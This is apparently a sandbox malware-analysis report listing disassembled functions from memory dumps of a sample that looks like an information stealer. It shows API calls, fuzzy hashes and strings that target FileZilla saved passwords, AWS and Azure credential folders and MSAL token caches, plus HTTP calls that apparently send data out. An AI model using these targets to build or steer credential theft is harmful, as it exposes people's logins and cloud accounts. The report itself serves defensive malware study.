                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$AllocFileLocal$Heapstrtok_s$CloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                  • String ID: <Host>$<Pass encoding="base64">$<Port>$<User>$NA$NA$\AppData\Roaming\FileZilla\recentservers.xml$browser: FileZilla$login: $password: $profile: null$url:
                                  • API String ID: 337689325-514892060
                                  • Opcode ID: 24a6a77c51899f0f0ad4d5ee2bcc125a881a5e765c72c69dc46a4671f7c1426f
                                  • Instruction ID: d15eb70b6d553ab1cc94bc99ca27928082ec116ada4a7d19c18b432e65637ade
                                  • Opcode Fuzzy Hash: 24a6a77c51899f0f0ad4d5ee2bcc125a881a5e765c72c69dc46a4671f7c1426f
                                  • Instruction Fuzzy Hash: 86D16D75A41208ABCB04FBF1DD86EEE7379FF14314F50441EF102A6091DE78AA96CB69
                                  APIs
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A204), ref: 022B9B08
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5C8), ref: 022B9B21
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A644), ref: 022B9B39
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A264), ref: 022B9B51
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A250), ref: 022B9B6A
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2F8), ref: 022B9B82
                                  • GetProcAddress.KERNEL32(0064A8B0,ct), ref: 022B9B9A
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A33C), ref: 022B9BB3
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A5A0), ref: 022B9BCB
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A548), ref: 022B9BE3
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A3BC), ref: 022B9BFC
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A2E8), ref: 022B9C14
                                  • GetProcAddress.KERNEL32(0064A8B0,@et), ref: 022B9C2C
                                  • GetProcAddress.KERNEL32(0064A8B0, u), ref: 022B9C45
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A598), ref: 022B9C5D
                                  • GetProcAddress.KERNEL32(0064A8B0,`et), ref: 022B9C75
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A418), ref: 022B9C8E
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A634), ref: 022B9CA6
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A0BC), ref: 022B9CBE
                                  • GetProcAddress.KERNEL32(0064A8B0,0064A12C), ref: 022B9CD7
                                  • GetProcAddress.KERNEL32(0064A8B0,bt), ref: 022B9CEF
                                  • LoadLibraryA.KERNEL32(0064A550,?,022B6C67), ref: 022B9D01
                                  • LoadLibraryA.KERNEL32(0064A17C,?,022B6C67), ref: 022B9D12
                                  • LoadLibraryA.KERNEL32(0064A104,?,022B6C67), ref: 022B9D24
                                  • LoadLibraryA.KERNEL32(0064A1DC,?,022B6C67), ref: 022B9D36
                                  • LoadLibraryA.KERNEL32(8u,?,022B6C67), ref: 022B9D47
                                  • GetProcAddress.KERNEL32(0064A6D4,0064A4AC), ref: 022B9D69
                                  • GetProcAddress.KERNEL32(0064A7F4,Pu), ref: 022B9D8A
                                  • GetProcAddress.KERNEL32(0064A7F4,hu), ref: 022B9DA2
                                  • GetProcAddress.KERNEL32(0064A8E4,0064A394), ref: 022B9DC4
                                  • GetProcAddress.KERNEL32(0064A7A8, ct), ref: 022B9DE5
                                  • GetProcAddress.KERNEL32(0064A7D8,0064A414), ref: 022B9E06
                                  • GetProcAddress.KERNEL32(0064A7D8,00420724), ref: 022B9E1D
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: AddressProc$LibraryLoad
                                  • String ID: u$ ct$8u$@et$Pu$`et$hu$bt$ct
                                  • API String ID: 2238633743-4032915498
                                  • Opcode ID: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction ID: f5d0f23fbaf8dac15f08467e2b0881976a8dc43505c500d6cdef67f39fc35545
                                  • Opcode Fuzzy Hash: 5241b63200b37b02610696a8d235fc94b134fee8225fd0051d7d8784b632fee7
                                  • Instruction Fuzzy Hash: EFA13CBD5D0240BFE364EFE8ED88A963BFBF74E301714661AE605C3264D6399441DB12
                                  APIs
                                  • lstrlen.KERNEL32(00424DA0), ref: 022A4833
                                  • lstrlen.KERNEL32(00424E50), ref: 022A483E
                                  • lstrlen.KERNEL32(00424F18), ref: 022A4849
                                  • lstrlen.KERNEL32(00424FD0), ref: 022A4854
                                  • lstrlen.KERNEL32(00425078), ref: 022A485F
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 022A486E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022A4875
                                  • lstrlen.KERNEL32(00425120), ref: 022A4883
                                  • lstrlen.KERNEL32(004251C8), ref: 022A488E
                                  • lstrlen.KERNEL32(00425270), ref: 022A4899
                                  • lstrlen.KERNEL32(00425318), ref: 022A48A4
                                  • lstrlen.KERNEL32(004253C0), ref: 022A48AF
                                  • lstrlen.KERNEL32(00425468), ref: 022A48C3
                                  • lstrlen.KERNEL32(00425510), ref: 022A48CE
                                  • lstrlen.KERNEL32(004255B8), ref: 022A48D9
                                  • lstrlen.KERNEL32(00425660), ref: 022A48E4
                                  • lstrlen.KERNEL32(00425708), ref: 022A48EF
                                  • lstrlen.KERNEL32(004257B0), ref: 022A4918
                                  • lstrlen.KERNEL32(00425858), ref: 022A4923
                                  • lstrlen.KERNEL32(00425920), ref: 022A492E
                                  • lstrlen.KERNEL32(004259C8), ref: 022A4939
                                  • lstrlen.KERNEL32(00425A70), ref: 022A4944
                                  • strlen.MSVCRT ref: 022A4957
                                  • lstrlen.KERNEL32(00425B18), ref: 022A497F
                                  • lstrlen.KERNEL32(00425BC0), ref: 022A498A
                                  • lstrlen.KERNEL32(00425C68), ref: 022A4995
                                  • lstrlen.KERNEL32(00425D10), ref: 022A49A0
                                  • lstrlen.KERNEL32(00425DB8), ref: 022A49AB
                                  • lstrlen.KERNEL32(00425E60), ref: 022A49BB
                                  • lstrlen.KERNEL32(00425F08), ref: 022A49C6
                                  • lstrlen.KERNEL32(00425FB0), ref: 022A49D1
                                  • lstrlen.KERNEL32(00426058), ref: 022A49DC
                                  • lstrlen.KERNEL32(00426100), ref: 022A49E7
                                  • VirtualProtect.KERNEL32(?,00000004,00000100,00000000), ref: 022A4A03
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Heap$AllocateProcessProtectVirtualstrlen
                                  • String ID:
                                  • API String ID: 2127927946-0
                                  • Opcode ID: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction ID: d8eefe834ba6e1c1e9dec50cfd70b234234eee6fe4ae3617271860d3fd71b948
                                  • Opcode Fuzzy Hash: 60c508d88f0449400eea4780d1c2a55aa70dbc5de1ae23165444dfbd3f1c6033
                                  • Instruction Fuzzy Hash: A041A779740624EBC718AFE5EC89B987F71AB4C712BA0C062F90299190CBF5D5119B3E
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022B9047: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 022B9072
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAA07: lstrcpy.KERNEL32(?,00000000), ref: 022BAA4D
                                    • Part of subcall function 022A9C27: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 022A9C53
                                    • Part of subcall function 022A9C27: GetFileSizeEx.KERNEL32(000000FF,?), ref: 022A9C78
                                    • Part of subcall function 022A9C27: LocalAlloc.KERNEL32(00000040,?), ref: 022A9C98
                                    • Part of subcall function 022A9C27: ReadFile.KERNEL32(000000FF,?,00000000,022A16F6,00000000), ref: 022A9CC1
                                    • Part of subcall function 022A9C27: LocalFree.KERNEL32(022A16F6), ref: 022A9CF7
                                    • Part of subcall function 022A9C27: CloseHandle.KERNEL32(000000FF), ref: 022A9D01
                                    • Part of subcall function 022B9097: LocalAlloc.KERNEL32(00000040,-00000001), ref: 022B90B9
                                  • strtok_s.MSVCRT ref: 022B0582
                                  • GetProcessHeap.KERNEL32(00000000,000F423F,00420DBA,00420DB7,00420DB6,00420DB3), ref: 022B05C9
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022B05D0
                                  • StrStrA.SHLWAPI(00000000,00421618), ref: 022B05EC
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B05FA
                                    • Part of subcall function 022B8B47: malloc.MSVCRT ref: 022B8B4F
                                    • Part of subcall function 022B8B47: strncpy.MSVCRT ref: 022B8B6A
                                  • StrStrA.SHLWAPI(00000000,00421620), ref: 022B0636
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B0644
                                  • StrStrA.SHLWAPI(00000000,00421628), ref: 022B0680
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B068E
                                  • StrStrA.SHLWAPI(00000000,00421630), ref: 022B06CA
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B06DC
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B0769
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B0781
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B0799
                                  • lstrlen.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B07B1
                                  • lstrcat.KERNEL32(?,0042164C), ref: 022B07C9
                                  • lstrcat.KERNEL32(?,00421660), ref: 022B07D8
                                  • lstrcat.KERNEL32(?,00421670), ref: 022B07E7
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B07FA
                                  • lstrcat.KERNEL32(?,00421678), ref: 022B0809
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B081C
                                  • lstrcat.KERNEL32(?,0042167C), ref: 022B082B
                                  • lstrcat.KERNEL32(?,00421680), ref: 022B083A
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B084D
                                  • lstrcat.KERNEL32(?,00421688), ref: 022B085C
                                  • lstrcat.KERNEL32(?,0042168C), ref: 022B086B
                                  • lstrcat.KERNEL32(?,00000000), ref: 022B087E
                                  • lstrcat.KERNEL32(?,00421698), ref: 022B088D
                                  • lstrcat.KERNEL32(?,0042169C), ref: 022B089C
                                  • strtok_s.MSVCRT ref: 022B08E0
                                  • lstrlen.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00420DB2), ref: 022B08F5
                                  • memset.MSVCRT ref: 022B0944
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrlen$lstrcpy$FileLocal$AllocHeapstrtok_s$AllocateCloseCreateFolderFreeHandlePathProcessReadSizemallocmemsetstrncpy
                                  • String ID:
                                  • API String ID: 3689735781-0
                                  • Opcode ID: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                  • Instruction ID: ab9d025dace0c8d97d4dec2522a4caebe78f3d94bb6abd69e6d7e59368160c8d
                                  • Opcode Fuzzy Hash: c4d654fd63af8b96c424d1b0ea7922b0682d9adc7819136a205fb9eb7b79f56e
                                  • Instruction Fuzzy Hash: 11D15A75A20308ABCB05EBF4DD95EEEB77ABF14340F508518E102A6198DF38AA45CF61
                                  APIs
                                    • Part of subcall function 0041A7A0: lstrcpy.KERNEL32(?,00000000), ref: 0041A7E6
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 004047EA
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404801
                                    • Part of subcall function 004047B0: ??2@YAPAXI@Z.MSVCRT(00000800), ref: 00404818
                                    • Part of subcall function 004047B0: lstrlenA.KERNEL32(00000000,00000000,0000003C), ref: 00404839
                                    • Part of subcall function 004047B0: InternetCrackUrlA.WININET(00000000,00000000), ref: 00404849
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                  • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000), ref: 004059F8
                                  • StrCmpCA.SHLWAPI(?,00750148), ref: 00405A13
                                  • InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00405B93
                                  • lstrlenA.KERNEL32(00000000,00000000,?,00000000,00000000,?,",00000000,?,007829B8,00000000,?,00749938,00000000,?,00421A1C), ref: 00405E71
                                  • lstrlenA.KERNEL32(00000000), ref: 00405E82
                                  • GetProcessHeap.KERNEL32(00000000,?), ref: 00405E93
                                  • HeapAlloc.KERNEL32(00000000), ref: 00405E9A
                                  • lstrlenA.KERNEL32(00000000), ref: 00405EAF
                                  • memcpy.MSVCRT(?,00000000,00000000), ref: 00405EC6
                                  • lstrlenA.KERNEL32(00000000), ref: 00405ED8
                                  • lstrlenA.KERNEL32(00000000,00000000,00000000), ref: 00405EF1
                                  • memcpy.MSVCRT(?), ref: 00405EFE
                                  • lstrlenA.KERNEL32(00000000,?,?), ref: 00405F1B
                                  • HttpSendRequestA.WININET(00000000,00000000,00000000), ref: 00405F2F
                                  • InternetReadFile.WININET(00000000,?,000000C7,?), ref: 00405F4C
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FB0
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FBD
                                  • HttpOpenRequestA.WININET(00000000,00782898,?,007821A8,00000000,00000000,00400100,00000000), ref: 00405BF8
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • InternetCloseHandle.WININET(00000000), ref: 00405FC7
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrlen$Internet$lstrcpy$??2@CloseHandle$HeapHttpOpenRequestlstrcatmemcpy$AllocConnectCrackFileProcessReadSend
                                  • String ID: "$"$------$------$------
                                  • API String ID: 1406981993-2180234286
                                  • Opcode ID: 5a3a4c6f642c51d95aedfef3bc05ad6ab1327865178b1c6bba112ca90ce5864b
                                  • Instruction ID: 7b5b204680124ce1d4beb717fdfef1c68a0c63715f2d18b0248442adb904f056
                                  • Opcode Fuzzy Hash: 5a3a4c6f642c51d95aedfef3bc05ad6ab1327865178b1c6bba112ca90ce5864b
                                  • Instruction Fuzzy Hash: 20124071821118ABCB15FBA1DC95FEEB378BF14314F50419EB10A62091DF782B9ACF69
                                  APIs
                                  • memset.MSVCRT ref: 00414D87
                                    • Part of subcall function 00418DE0: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 00418E0B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414DB0
                                  • lstrcatA.KERNEL32(?,\.azure\), ref: 00414DCD
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 0041492C
                                    • Part of subcall function 00414910: FindFirstFileA.KERNEL32(?,?), ref: 00414943
                                  • memset.MSVCRT ref: 00414E13
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414E3C
                                  • lstrcatA.KERNEL32(?,\.aws\), ref: 00414E59
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FDC), ref: 00414971
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,00420FE0), ref: 00414987
                                    • Part of subcall function 00414910: FindNextFileA.KERNEL32(000000FF,?), ref: 00414B7D
                                    • Part of subcall function 00414910: FindClose.KERNEL32(000000FF), ref: 00414B92
                                  • memset.MSVCRT ref: 00414E9F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 00414EC8
                                  • lstrcatA.KERNEL32(?,\.IdentityService\), ref: 00414EE5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149B0
                                    • Part of subcall function 00414910: StrCmpCA.SHLWAPI(?,004208D2), ref: 004149C5
                                    • Part of subcall function 00414910: wsprintfA.USER32 ref: 004149E2
                                    • Part of subcall function 00414910: PathMatchSpecA.SHLWAPI(?,?), ref: 00414A1E
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00750258,?,000003E8), ref: 00414A4A
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FF8), ref: 00414A5C
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A70
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,00420FFC), ref: 00414A82
                                    • Part of subcall function 00414910: lstrcatA.KERNEL32(?,?), ref: 00414A96
                                    • Part of subcall function 00414910: CopyFileA.KERNEL32(?,?,00000001), ref: 00414AAC
                                    • Part of subcall function 00414910: DeleteFileA.KERNEL32(?), ref: 00414B31
                                  • memset.MSVCRT ref: 00414F2B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Filememset$Findwsprintf$Path$CloseCopyDeleteFirstFolderMatchNextSpec
                                  • String ID: *.*$*.*$Azure\.IdentityService$Azure\.aws$Azure\.azure$\.IdentityService\$\.aws\$\.azure\$msal.cache$zaA
                                  • API String ID: 4017274736-156832076
                                  • Opcode ID: 7769cd15d224279b6a8c431d0011313115eb2ccd46c8e18735444d99bbb5ff41
                                  • Instruction ID: 18812f4626155d1e2a42465cb68794f5c6847905bec5d07e7ac1139e0e5490f3
                                  • Opcode Fuzzy Hash: 7769cd15d224279b6a8c431d0011313115eb2ccd46c8e18735444d99bbb5ff41
                                  • Instruction Fuzzy Hash: 3141D6B9A4031467C710F7B0EC47FDD3738AB64704F404459B645660C2EEB897D98B9A
                                  APIs
                                    • Part of subcall function 022BA9A7: lstrcpy.KERNEL32(00420E17,00000000), ref: 022BA9EF
                                    • Part of subcall function 022BAC17: lstrlen.KERNEL32(?,0064A1F0,?,00424FBC,00420E17), ref: 022BAC2C
                                    • Part of subcall function 022BAC17: lstrcpy.KERNEL32(00000000), ref: 022BAC6B
                                    • Part of subcall function 022BAC17: lstrcat.KERNEL32(00000000,00000000), ref: 022BAC79
                                    • Part of subcall function 022BAB07: lstrcpy.KERNEL32(?,00420E17), ref: 022BAB6C
                                    • Part of subcall function 022B8DC7: GetSystemTime.KERNEL32(00420E1A,0064A2A4,004205AE,?,?,022A1660,?,0000001A,00420E1A,00000000,?,0064A1F0,?,00424FBC,00420E17), ref: 022B8DED
                                    • Part of subcall function 022BAB87: lstrcpy.KERNEL32(00000000,?), ref: 022BABD9
                                    • Part of subcall function 022BAB87: lstrcat.KERNEL32(00000000), ref: 022BABE9
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 022AD1EA
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 022AD32E
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 022AD335
                                  • lstrcat.KERNEL32(?,00000000), ref: 022AD46F
                                  • lstrcat.KERNEL32(?,00421478), ref: 022AD47E
                                  • lstrcat.KERNEL32(?,00000000), ref: 022AD491
                                  • lstrcat.KERNEL32(?,0042147C), ref: 022AD4A0
                                  • lstrcat.KERNEL32(?,00000000), ref: 022AD4B3
                                  • lstrcat.KERNEL32(?,00421480), ref: 022AD4C2
                                  • lstrcat.KERNEL32(?,00000000), ref: 022AD4D5
                                  • lstrcat.KERNEL32(?,00421484), ref: 022AD4E4
                                  • lstrcat.KERNEL32(?,00000000), ref: 022AD4F7
                                  • lstrcat.KERNEL32(?,00421488), ref: 022AD506
                                  • lstrcat.KERNEL32(?,00000000), ref: 022AD519
                                  • lstrcat.KERNEL32(?,0042148C), ref: 022AD528
                                  • lstrcat.KERNEL32(?,00000000), ref: 022AD53B
                                  • lstrcat.KERNEL32(?,00421490), ref: 022AD54A
                                    • Part of subcall function 022BAA87: lstrlen.KERNEL32(022A516C,?,?,022A516C,00420DDE), ref: 022BAA92
                                    • Part of subcall function 022BAA87: lstrcpy.KERNEL32(00420DDE,00000000), ref: 022BAAEC
                                  • lstrlen.KERNEL32(?), ref: 022AD591
                                  • lstrlen.KERNEL32(?), ref: 022AD5A0
                                  • memset.MSVCRT ref: 022AD5EF
                                    • Part of subcall function 022BACD7: StrCmpCA.SHLWAPI(0064A350,022AAA0E,?,022AAA0E,0064A350), ref: 022BACF6
                                  • DeleteFileA.KERNEL32(00000000), ref: 022AD61B
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2204339831.00000000022A0000.00000040.00001000.00020000.00000000.sdmp, Offset: 022A0000, based on PE: false
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_22a0000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$lstrcpy$lstrlen$FileHeap$AllocateCopyDeleteProcessSystemTimememset
                                  • String ID:
                                  • API String ID: 1973479514-0
                                  • Opcode ID: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                  • Instruction ID: 23bace1a0c9bff38faa9fe3ab7639e09e802b0f143f94a6699cf99d9f4961d4d
                                  • Opcode Fuzzy Hash: 35b3a7c6026b7343794acd9bc88f8a24a43edb670061b4873ce96399e81ec4f6
                                  • Instruction Fuzzy Hash: 02E16975960208ABCB09FBE4DD95EEE737ABF25341F104159F106A71A8DF34AA08CF61
                                  APIs
                                    • Part of subcall function 0041A740: lstrcpy.KERNEL32(B,00000000), ref: 0041A788
                                    • Part of subcall function 0041A9B0: lstrlenA.KERNEL32(?,00421110,?,00000000,00420AEF), ref: 0041A9C5
                                    • Part of subcall function 0041A9B0: lstrcpy.KERNEL32(00000000), ref: 0041AA04
                                    • Part of subcall function 0041A9B0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AA12
                                    • Part of subcall function 0041A8A0: lstrcpy.KERNEL32(?,B), ref: 0041A905
                                    • Part of subcall function 00418B60: GetSystemTime.KERNEL32(?,00749878,004205AE,?,?,?,?,?,?,?,?,?,00404963,?,00000014), ref: 00418B86
                                    • Part of subcall function 0041A920: lstrcpy.KERNEL32(00000000,?), ref: 0041A972
                                    • Part of subcall function 0041A920: lstrcatA.KERNEL32(00000000), ref: 0041A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040CF83
                                  • GetProcessHeap.KERNEL32(00000000,05F5E0FF), ref: 0040D0C7
                                  • HeapAlloc.KERNEL32(00000000), ref: 0040D0CE
                                  • lstrcatA.KERNEL32(?,00000000,007500C8,00421474,007500C8,00421470,00000000), ref: 0040D208
                                  • lstrcatA.KERNEL32(?,00421478), ref: 0040D217
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D22A
                                  • lstrcatA.KERNEL32(?,0042147C), ref: 0040D239
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D24C
                                  • lstrcatA.KERNEL32(?,00421480), ref: 0040D25B
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D26E
                                  • lstrcatA.KERNEL32(?,00421484), ref: 0040D27D
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D290
                                  • lstrcatA.KERNEL32(?,00421488), ref: 0040D29F
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2B2
                                  • lstrcatA.KERNEL32(?,0042148C), ref: 0040D2C1
                                  • lstrcatA.KERNEL32(?,00000000), ref: 0040D2D4
                                  • lstrcatA.KERNEL32(?,00421490), ref: 0040D2E3
                                    • Part of subcall function 0041A820: lstrlenA.KERNEL32(00000000,?,?,00415B54,00420ADB,00420ADA,?,?,00416B16,00000000,?,007478F8,?,0042110C,?,00000000), ref: 0041A82B
                                    • Part of subcall function 0041A820: lstrcpy.KERNEL32(B,00000000), ref: 0041A885
                                  • lstrlenA.KERNEL32(?), ref: 0040D32A
                                  • lstrlenA.KERNEL32(?), ref: 0040D339
                                  • memset.MSVCRT ref: 0040D388
                                    • Part of subcall function 0041AA70: StrCmpCA.SHLWAPI(00000000,00421470,0040D1A2,00421470,00000000), ref: 0041AA8F
                                  • DeleteFileA.KERNEL32(00000000), ref: 0040D3B4
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.2203797459.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000000.00000002.2203797459.00000000004B1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004BD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.00000000004E2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000064A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  • Associated: 00000000.00000002.2203797459.000000000065C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_400000_100f1c346cbcff15f4d9d75c791000625850e1c82b44c.jbxd
                                  Yara matches
                                  Similarity
